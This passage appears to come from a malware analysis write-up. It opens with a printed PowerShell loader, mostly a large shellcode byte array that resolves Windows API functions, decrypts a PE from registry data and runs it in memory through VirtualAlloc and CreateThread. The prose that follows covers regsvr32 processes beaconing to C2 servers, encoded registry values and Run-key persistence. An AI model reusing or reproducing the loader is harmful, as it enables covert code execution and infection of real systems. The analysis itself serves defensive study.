pj#>0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,<#qkq#>0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,<#at#>0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,<#nxg#>0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,<#lcb#>0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,<#olr#>0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x61,0x72,0x79,0x41,<#na#>0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,<#xtg#>0x8B,0x00,0x8B,0x55,0xCC,<#ige#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,<#usr#>0x81,0x39,0x47,0x65,0x74,0x50,<#nfz#>0x75,0x56,0x8D,0x41,0x04,0x81,0x38,<#cp#>0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#jo#>0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,<#sbs#>0x75,0x38,0x8B,<#ac#>0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,<#dd#>0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,<#vue#>0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,<#lx#>0x02,0x03,<#pha#>0xD0,0x8B,<#st#>0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,<#oai#>0x81,0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,<#ums#>0x38,<#vzz#>0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,<#uu#>0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,<#jpx#>0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#sxs#>0xA8,0x81,0x39,<#kdk#>0x45,0x78,0x69,0x74,0x75,0x63,0x8D,0x41,0x04,<#iwj#>0x81,<#wny#>0x38,0x50,0x72,0x6F,0x63,0x75,0x58,0x8D,<#mpl#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,<#eo#>0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,<#xzx#>0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#bx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,<#mey#>0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,<#ebh#>0x03,0xD0,<#qyl#>0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,<#dni#>0x0F,0x85,0x3E,0xFE,0xFF,0xFF,<#qn#>0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,0x85,<#mzf#>0x36,0xFF,0xFF,0xFF,0x32,<#ld#>0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,<#lbr#>0xFF,0xFF,0x6C,<#pu#>0xC6,0x85,0x3B,0xFF,0xFF,0xFF,0x00,0x8D,0x85,0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0xC3,<#th#>0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,<#ksk#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#uaz#>0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0xCB,0x81,0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,0x35,<#tx#>0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,0x8D,<#niu#>0x41,0x04,0x81,0x38,<#jk#>0x75,0x65,0x72,<#lq#>0x79,0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,0x38,0x65,0x45,0x78,0x41,0x75,0x3D,0x83,0xC1,<#yqf#>0x10,0x80,0x39,0x00,0x75,<#tn#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,<#wtn#>0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,<#vt#>0xC3,0x89,<#hne#>0x45,0xAC,0x46,<#men#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,<#ckz#>0xFE,0xFF,0xFF,0x8B,0x45,0x08,0x05,0x48,0x0A,0x00,0x00,0x89,0x85,0x7C,0xFF,0xFF,0xFF,<#ikq#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,<#qev#>0x00,0x89,<#xsb#>0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,0x85,0x64,<#ao#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x02,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,<#oz#>0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,<#xde#>0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,<#chq#>0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bu#>0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#kf#>0xFF,<#yac#>0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,<#yl#>0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#mx#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#hn#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,<#ds#>0x85,0xB8,0x00,0x00,0x00,0x33,0xC0,0x89,0x85,<#uu#>0x64,0xFF,0xFF,0xFF,<#xo#>0x33,0xC0,0x89,0x85,<#mnf#>0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,<#gdg#>0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#gwq#>0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,<#nrl#>0x55,0xAC,0x85,<#as#>0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,<#qr#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#fzq#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,<#npu#>0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,<#epp#>0x85,<#rc#>0x70,0xFF,0xFF,0xFF,<#poi#>0x50,<#tg#>0xFF,0x55,0xAC,<#stt#>0x85,0xC0,<#kw#>0x75,0x02,0xB3,0x01,0x84,0xDB,<#sax#>0x75,0x05,<#omp#>0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,<#txd#>0xDC,0x00,0x00,0x00,0x50,0x8B,0x85,<#arg#>0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x52,0x50,0x8D,0x85,0x00,0xFA,0xFF,0xFF,0x50,<#cpp#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,0x89,0x31,0x46,0x83,0xC1,0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xF2,0x33,0xDB,0x33,0xF6,0x8D,0x8D,0x00,0xFB,0xFF,0xFF,<#axj#>0x03,0x19,<#vqm#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0xFF,0xB0,0xDC,0x00,0x00,0x00,0x8B,0xC6,<#wrv#>0x5A,0x8B,0xFA,0x33,0xD2,0xF7,0xF7,0x33,0xC0,0x8A,0x84,0x15,0x00,0xFA,0xFF,0xFF,0x03,0xD8,0x81,0xE3,0xFF,0x00,0x00,0x00,0x8A,0x01,<#onn#>0x8B,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x89,0x11,0x25,0xFF,0x00,0x00,0x00,0x89,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x46,0x83,0xC1,<#zq#>0x04,0x81,0xFE,0x00,0x01,0x00,0x00,0x75,0xB5,<#zjb#>0x33,0xDB,0x33,0xFF,<#xgp#>0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,<#dn#>0x85,<#oo#>0x60,0xFF,0xFF,0xFF,0x50,0x6A,<#bzq#>0x00,0xFF,<#ato#>0x55,<#tu#>0xA8,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x83,0xBD,0x5C,0xFF,<#kk#>0xFF,0xFF,0x00,0x74,0x29,0x8B,0x85,<#ynp#>0x5C,0xFF,0xFF,0xFF,0x89,0x85,<#ttp#>0x4C,0xFF,0xFF,0xFF,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bbk#>0x4C,0xFF,0xFF,0xFF,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0xEB,0x05,0x6A,0x00,0xFF,0x55,0xA4,0x8B,0x85,0x60,0xFF,<#ddv#>0xFF,0xFF,0x48,0x85,0xC0,0x72,0x74,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x43,0x81,0xE3,0xFF,0x00,0x00,0x00,0x03,0xBC,0x9D,0x00,0xFB,0xFF,0xFF,0x81,0xE7,0xFF,0x00,0x00,0x00,0x8A,0x84,0x9D,0x00,0xFB,0xFF,0xFF,0x8B,0x94,0xBD,0x00,0xFB,0xFF,<#upn#>0xFF,0x89,0x94,0x9D,0x00,0xFB,0xFF,0xFF,0x25,<#xrf#>0xFF,0x00,0x00,0x00,0x89,0x84,0xBD,0x00,0xFB,0xFF,0xFF,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x8A,0x04,0x30,0x8B,0x94,0x9D,0x00,<#crf#>0xFB,0xFF,0xFF,0x03,0x94,0xBD,0x00,0xFB,0xFF,0xFF,0x81,0xE2,0xFF,0x00,0x00,0x00,<#oa#>0x32,0x84,0x95,0x00,0xFB,0xFF,0xFF,0x8B,0x95,0x4C,0xFF,0xFF,0xFF,0x88,0x04,0x32,0x46,<#suu#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0x95,0x8B,0x85,<#tx#>0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0xDA,0x02,0x00,0x00,0x8B,0x45,<#yn#>0xD4,0x8B,0x40,0x3C,0x03,0x85,0x4C,0xFF,0xFF,0xFF,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xBC,<#vy#>0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x58,0x50,0x03,0xDB,0x6A,0x40,<#lv#>0x68,0x00,0x30,0x00,0x00,<#dlf#>0x53,<#fru#>0x6A,<#ar#>0x00,0xFF,0x55,0xA8,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x9A,0x02,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x54,0x50,0x8B,<#sp#>0x85,<#ltb#>0x4C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0xF8,<#lfl#>0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x04,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE0,0x00,0x00,0x00,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x8B,0x80,0xE0,0x00,0x00,0x00,0x50,0x8B,0x85,0x4C,0xFF,0xFF,<#rpo#>0xFF,0x50,0x8B,0x45,0xD0,0x8B,0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x50,0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x6A,0x60,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x7A,0x50,0x8B,0x45,0xD0,0x8B,<#imm#>0x40,0x50,0x03,0x45,0xF8,0x83,0xC0,0x04,0x8B,<#wfm#>0x95,0x7C,0xFF,0xFF,0xFF,0x03,0x82,0xE0,0x00,0x00,0x00,0x50,<#pj#>0xFF,0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x48,0x85,0xC0,0x7C,0x5F,0x40,0x89,<#not#>0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,<#qv#>0x8B,0x55,0xD4,0x8B,0x52,0x3C,0x8B,0x85,0x4C,0xFF,0xFF,0xFF,0x03,0xD0,0x81,0xC2,0xF8,<#yxg#>0x00,0x00,0x00,0x8B,0xCE,0xC1,0xE1,0x03,0x8D,<#xe#>0x0C,0x89,0x03,<#vzm#>0xD1,0x89,0x95,0x50,0xFF,0xFF,<#hki#>0xFF,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x10,0x52,0x8B,0x95,0x50,0xFF,0xFF,0xFF,0x8B,0x52,0x14,0x03,0xD0,0x52,0x8B,0x85,0x50,0xFF,0xFF,0xFF,0x8B,<#gk#>0x40,0x0C,0x03,0x45,0xF8,0x50,0xFF,0x95,0x78,0xFF,<#zci#>0xFF,0xFF,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x75,0xAA,0x8B,0x45,0xD0,0x8B,0x40,<#ri#>0x34,<#ssf#>0x3B,0x45,0xF8,0x0F,0x84,<#vm#>0xCB,0x00,<#ns#>0x00,0x00,0x8B,<#qvm#>0x45,0xD0,0x8B,0x55,0xF8,0x2B,0x50,0x34,0x89,0x55,0xD8,0x8B,0x45,0xF8,0x89,0x45,0xF0,0x8B,0x45,0xD0,0x83,0xB8,0xA4,<#of#>0x00,0x00,<#yk#>0x00,0x00,0x0F,0x86,0x87,0x00,0x00,<#va#>0x00,0x8B,0x45,0xD0,0x8B,0x80,0xA0,<#mx#>0x00,0x00,0x00,0x03,0x45,0xF0,0x89,<#lku#>0x45,0xEC,0xEB,0x6E,0x8B,0x45,0xEC,0x8B,0x00,0x03,0x45,0xF0,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x83,0xC0,0x08,0x89,0x45,<#itp#>0xE4,<#vf#>0x8B,0x45,0xEC,0x8B,0x40,0x04,0x83,0xE8,0x08,0xD1,0xE8,0x48,0x85,0xC0,0x72,0x3E,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x8B,0x45,0xE4,0x66,0x8B,0x10,0x0F,0xB7,0xC2,0xC1,0xE8,0x0C,0x8B,0xCA,0x66,<#qv#>0x81,0xE1,0xFF,0x0F,0x0F,0xB7,0xC9,0x83,0xF8,0x03,0x75,0x10,0x8B,0x45,0xE8,0x03,0xC1,0x89,0x45,0xE0,0x8B,0x45,0xE0,0x8B,0x55,0xD8,0x01,0x10,0x83,0x45,0xE4,0x02,0xFF,0x8D,0x3C,0xFF,0xFF,<#sw#>0xFF,<#vj#>0x75,0xC9,0x8B,0x45,0xEC,0x8B,0x40,0x04,0x03,0x45,<#it#>0xEC,0x89,<#ikx#>0x45,<#irx#>0xEC,0x8B,0x45,0xEC,0x83,0x38,0x00,0x77,0x8A,0x8B,0x45,0xD0,0x8B,0x55,0xF8,0x89,0x50,0x34,0x68,0xF8,0x00,0x00,0x00,0x8B,<#yia#>0x45,<#ngg#>0xD0,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x03,0x45,0xF8,0x50,0xFF,<#lw#>0x95,0x78,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,0x05,0x80,0x00,0x00,0x00,0x89,0x45,<#eeu#>0x90,0x8B,0x45,0x90,0x83,0x78,0x04,0x00,0x0F,<#ebt#>0x86,0x9E,0x00,<#cf#>0x00,<#iuu#>0x00,0x8B,0x45,<#iu#>0xD0,0x8B,0x80,0x80,<#sg#>0x00,0x00,<#tav#>0x00,0x03,0x45,0xF8,0x89,0x45,0x8C,0xEB,0x7F,0x03,<#kae#>0x7D,0xF8,0x57,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x74,0x72,0x8B,0x45,0x8C,0x83,0x38,0x00,0x74,0x0D,0x8B,0x45,0x8C,0x8B,0x00,<#da#>0x03,0x45,0xF8,0x89,0x45,0x88,0xEB,0x0C,0x8B,0x45,0x8C,0x8B,0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x88,0x8B,0x45,0x8C,0x8B,<#lo#>0x40,0x10,0x03,0x45,0xF8,0x89,0x45,0x84,0xEB,0x37,0x8B,0x45,0x88,<#ut#>0x8B,0x30,<#eyt#>0xF7,0xC6,0x00,0x00,0x00,0x80,0x74,0x12,0x81,0xE6,<#ruo#>0xFF,0xFF,0x00,0x00,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#sg#>0xEB,0x10,0x03,0x75,0xF8,0x83,0xC6,0x02,0x56,0x53,0xFF,0x55,0xB8,0x8B,0x55,0x84,0x89,0x02,<#ni#>0x83,0x45,0x88,<#eb#>0x04,0x83,<#fpa#>0x45,<#za#>0x84,0x04,0x8B,0x45,0x88,0x83,<#ezq#>0x38,0x00,0x75,0xC1,0x83,0x45,0x8C,0x14,0x8B,0x45,0x8C,0x8B,0x78,0x0C,0x85,0xFF,0x0F,0x85,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0xD0,<#fyw#>0x8B,0x40,0x28,0x03,0x45,0xF8,0x89,0x45,0xF4,0x31,0xC0,0x50,0x6A,0x01,0xFF,0x75,0xF8,0xFF,0x55,0xF4,<#vag#>0x6A,0x00,<#hoz#>0xFF,0x55,0xA4,<#mri#>0x5F,0x5E,<#qb#>0x5B,0x8B,0xE5,0x5D,0xC2,0x04,<#sh#>0x00,0x8D,0x40,<#mpx#>0x00,0x73,0x6F,0x66,0x74,0x77,0x61,0x72,0x65,0x5C,<#ytl#>0x37,<#zkf#>0x47,0x57,0x73,0x61,0x41,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#gca#>0x00,0x00,0x00,<#rz#>0x00,0x00,0x00,<#no#>0x00,0x00,0x00,<#dfd#>0x00,0x00,0x00,0x00,0x47,0x73,0x44,0x79,0x71,0x74,0x55,0x36,0x71,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x72,<#qfr#>0x82,0x97,0x46,0xE4,0x1B,0xF2,0xAB,0xD9,0x00,0x0A,0x97,0x82,0x25,0x5F,0xE4,0x99,0x5D,0xB6,0x8E,0x73,0x23,0x46,0x7A,0x92,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x00,0x68,0x00,0x65,<#ju#>0x00,0x6C,0x00,0x6C,0x00,0x3C,0x00,0x3C,<#aws#>0x00,0x3A,0x00,0x3A,0x00,<#bfw#>0x3E,0x00,0x3E,0x00,<#jp#>0x73,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x62,0x00,<#ad#>0x70,0x00,0x73,0x00,0x3A,0x00,0x3A,0x00,0x62,0x00,0x70,0x00,0x73,0x00,0x6E,0x00,0x75,0x00,0x6D,0x00,0x3A,0x00,0x38,0x00,0x36,0x00,0x34,0x00,<#vy#>0x3A,0x00,0x6E,0x00,0x75,<#zkg#>0x00,0x6D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,<#wcm#>0x00,0x00,<#kx#>0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x19,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,<#ae#>0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,0x75,0x0C,0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,<#bh#>0xD6,0x27,0xD1,0x58,0x00,0xA0,0x66,0x37,0x13,0x99,0x44,0x82,0x36,0x02,0xCF,0x82,0x58,0xCA,0x0B,0x78,0x64,0xB2,0xF7,0x99,0x2D,0x64,0xA7,<#nfv#>0xAB,0x5F,0x0D,0x9B,0xFB,0x45,0xC2,0x2B,0xAC,0x33,<#dxg#>0x55,0x13,0x8E,0xCC,0x66,0x63,0x12,0x97,0xED,0x6A,0xFE,0x7E,0x71,<#ay#>0x5B,0xED,<#fv#>0x2F,0xA4,0xC5,<#ong#>0xC7,0x8E,0x38,0x25,0xC9,0x97,0x04,<#ty#>0x16,0xB4,0x67,0xDD,0xFA,0x42,0x4F,0xBE,<#wp#>0x20,0x01,0x2D;
#ebfvxkffvl
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
#zfgd
if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
#phjynzzoqx
for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
#lvytjj
([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
#pjqtttzp
}sleep(1200);}catch{}exit;
#usrucw
#otlbloab

Like the two files that are dropped above, I am not sure what the difference is between the two regsvr32.exe processes. The parent process (PID 1740) is the process that keeps reaching out the C2s as seen in the image labeled “C2s.” This parent process is also responsible for creating and setting other registry keys/values which looks to be somewhat related to what the “a2.exe” process was doing too (for persistence). 

Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\tscz
Type:	REG_SZ
Length:	34
Data:	c2lCgcJpAleIXg==

-----

Path: HKCU\Software\lqoiarkklq\tscz
Type:	REG_SZ
Length:	34
Data:	dD9Hi8VsVasp+w==

-----

Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\rhllonear
Type:	REG_SZ
Length:	66
Data:	dW0V3ZU4UEEp/bQvhCo/2F9ajF1fefY=

Persistence is maintained via an entry in the “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” registry key which comes up with an error when you try to view it as seen in the image below.

Using “Autoruns” I am able to see that there is a pointer there in the registry and that it is pointing to the path of “C:\Users\Administrator\AppData\Local\1354e279\e7da1628.bat.” That file contains the following code:

